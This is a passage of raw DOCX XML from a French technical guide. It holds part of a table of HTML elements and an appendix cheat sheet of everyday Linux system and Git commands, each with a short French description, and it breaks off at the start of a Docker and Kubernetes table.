                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>reset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;fieldset&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;legend&gt;</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Groupe de champs</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Formulaires longs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;details&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;summary&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3278"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu repliable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>FAQ, aides</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>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&lt;dialog&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Boîte de dialogue native</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Modales accessibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Annexe B — Aide-mémoire DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Les commandes ci-dessous sont celles qui reviennent le plus souvent en exploitation. Chaque ligne est volontairement courte : la page de manuel reste la référence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Système et processus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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>uname -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version du noyau et architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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df -h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Occupation des systèmes de fichiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>du -sh *</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taille des éléments du dossier courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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free -h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Mémoire disponible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ps aux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Processus en cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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top</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>htop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Activité en temps réel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>systemctl status nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État d'un service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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journalctl -u nginx -f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Journaux d'un service en direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ss -tulpn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ports en écoute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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chmod 640 fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Droits lecture/écriture propriétaire, lecture groupe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chown user:group fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Changer propriétaire et groupe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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tar -czf archive.tgz dossier/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Archiver et compresser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Git</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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État de l'arbre de travail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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git switch -c feature/x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Créer et basculer sur une branche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git rebase main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rejouer les commits sur main</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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git log --oneline --graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Historique compact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git diff --staged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Différences indexées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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git restore --staged f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="534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Retirer un fichier de l'index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git commit --amend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corriger le dernier commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>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git stash -u</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>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Mettre de côté, fichiers non suivis inclus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git bisect start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5342"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Recherche binaire d'une régression</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Docker et Kubernetes</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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
